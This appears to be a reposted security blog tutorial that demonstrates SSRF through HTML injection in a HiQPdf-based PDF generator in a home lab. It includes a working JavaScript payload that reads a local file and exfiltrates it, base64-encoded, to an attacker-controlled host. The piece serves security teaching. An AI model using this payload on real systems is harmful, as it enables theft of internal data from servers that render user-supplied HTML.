Exploiting SSRF in PDF HTML Injection: Basic and Blind

3 months ago 69

BOOK THIS SPACE FOR AD

ARTICLE AD

On a recent application assessment, I encountered an endpoint that would take HTML from user input and generate a PDF from it. I knew that it was possible to perform SSRF by inserting an iframe, but I wanted to know how this would be abused in more complex scenarios. How about resources on different servers? How does CORS effect exploitation? What if I didn’t have access to the request response? I started exploring these in a bit more depth. This article is a brief overview of my findings, a simple lab setup, and some exploit examples.

Want to discuss it? I can be found on twitter @JowardBince.

Necessary disclaimer: this research is purely academic. Do not attempt any of these techniques on assets or applications that you do not have explicit permission to test.

A Brief Overview of SSRF & PDF Generation

For those unfamiliar, Server Side Request Forgery (SSRF) is a class of vulnerabilities in which an attacker can coerce a vulnerable server into making a request on the attacker’s behalf. This could allow an attacker to access internal resources, restricted portions of the application, and perhaps compromise the application itself. A common example is using SSRF to request information from cloud meta data services (See Hacktricks: Cloud SSRF for more details).

SSRF generally comes in two flavors: full read and blind. A full read SSRF returns the content of the response from the request to the attacker. Alternatively, blind SSRF does not return the content of the response.

How can this be applied to PDF generation? Often, web applications will use user input in the creation of a PDF. How the PDF and user input is rendered depends heavily on the library being used. However, many applications use HTML elements to easily format and layout the PDF. Therefore, if user input is being rendered in the PDF, it may be possible to insert new HTML elements. When the PDF is being generated server side, the app will make requests to remote resources as necessary to ensure that all of the HTML content included in the PDF is rendered properly on the final document. Therefore, if a user can insert an HTML element with a remote source, the server will make a request to that resource when the PDF is generated: SSRF.

The Lab

To demonstrate the principals behind SSRF in PDF generation, I’ve set up a simple web application and local lab. The application uses HiQPdf, a common .NET library used to turn HTML into PDFs. The home page is set up to take HTML from a POST form.

The code that processes the HTML is only 3 lines. It creates a new HtmlToPdf converter, saves the value of the html POST data in a variable called pdfBuffer, and uses the converter to create a PDF that is returned to the user as mypdf.pdf

This application is running on a Windows 10 host at the local address 192.168.0.133. I also have a second Kali host on the same subnet to demonstrate remote exploitation at the address 192.168.0.131.

Finally, there is a second web server running on 127.0.0.1:80 on the Windows host with a flag.txt document at it’s root. This will be our target.

Full Read Exploitation

In our lab, we know that the application is vulnerable to HTML injection. In this first example, we’ll be able to see the final PDF and all of the elements we insert. This is an easy scenario to exploit, as we only need to select an HTML element that will render the webpage we want to see; the simplest choice being an <iframe>.

By setting the source of the iframe to the desired resource, the resource will be queried when the PDF is generated and return the request response in full.

This is an extremely straight forward scenario. But what if we can’t see the full response?

Blind Exploitation

There are a few situations where we may not receive the response. Perhaps the PDF is generated and the content isn’t rendered clearly, or it may be placed in a location inaccessible to the user. In any case, it’s possible to send requests to remote resources but we’ll need a new way to get the response.

To outline the concept, we want the exploit to work something like this:

We’ll host an HTML document on a server we control that contains in-line JavaScript.The JavaScript will first send a request to the flag hosted on the machine locally.It will save the content of this response.It will then send the content of that response back to us in the form of a URL query string to a server we control.When we coerce the vulnerable server into accessing this page, the JavaScript it contains will be executed by the PDF generating framework, thus retrieving and sending data back to us without us ever seeing the final PDF.

There are two important caveats to exploitation to consider here. First, the CORS policy of the resource we want the server to query. Covering the specifics of CORS is beyond the scope of this article, but you can find a great explanation from PortSwigger and related vulnerabilities here. In the case of blind SSRF exploitation, we want the server to make a request to the remote resource and save the response. In order for the vulnerable server to save the response, the remote resource must have a relaxed CORS policy. For the sake of this example, our flag is hosted on a web server that has an open policy, where any origin may read the content of the response.

Second, whether or not the PDF framework that processes HTML also processes JavaScript within HTML. It’s possible that it renders only the HTML but not any in-line scripts. This is wholly dependent on the framework in use.

Hint: if you’re ever testing this on an application assessment or on a bug bounty target, you can often find the name of the framework in the metadata of PDFs created by the application.

Fortunately, HiQPdf does exactly that. If we create an iframe that renders a remote HTML page, the server will also execute the JavaScript on that page.

With all of that in mind, we can effectively write an exploit. Our HTML document is as follows:

exploit.html

<html>
<body>
<script>
const xhr = new XMLHttpRequest();
xhr.open('GET', 'http://127.0.0.1/flag.txt', false); // Synchronous request

xhr.send();

if (xhr.status === 200) {
const responseData = xhr.responseText;
url = 'http://192.168.0.131/?exfil=' + btoa(responseData);

const xhr2 = new XMLHttpRequest();
xhr2.open('GET', url, false); // Synchronous request
xhr2.setRequestHeader('Content-Type', 'text/plain');

xhr2.send();
}
</script>
</body>
</html>

Let’s walk through this briefly. The first section sends a GET request to the locally hosted flag using XMLHttpRequest(). The request itself must be synchronous. If it is not, then the PDF generator will send the request but it will not wait for the response. That makes the second step impossible to execute reliably.

The next section then checks if the first request was met with a 200 response code. It then saves the content of the response in a variable called responseData. The response data is then concatenated onto the URL of a server we control and encoded in base64 to ensure that it can be reliably sent. The vulnerable server then queries that URL.

Now we’ll do the exact same thing we did in the full read exploit and create an iframe. This time, the requested resource will be our exploit file instead of the flag.

We start our web server, and send the request. We receive two requests from the vulnerable server: one for our exploit, and the other with base64 encoded data! We decode the data, and have the value of the flag. We’ve successfully exploited blind SSRF to retrieve an inaccessible resource without ever having access to the PDF.

Conclusion

While SSRF is common in PDF generation, actual exploitation techniques may vary. Exploitation can depend heavily on the framework and language in use, whether the vulnerability is full read or blind, and the CORS policy of the desired resource. With that in mind, it’s still possible to take an incremental and novel approach to exploit these vulnerabilities.

Read Entire Article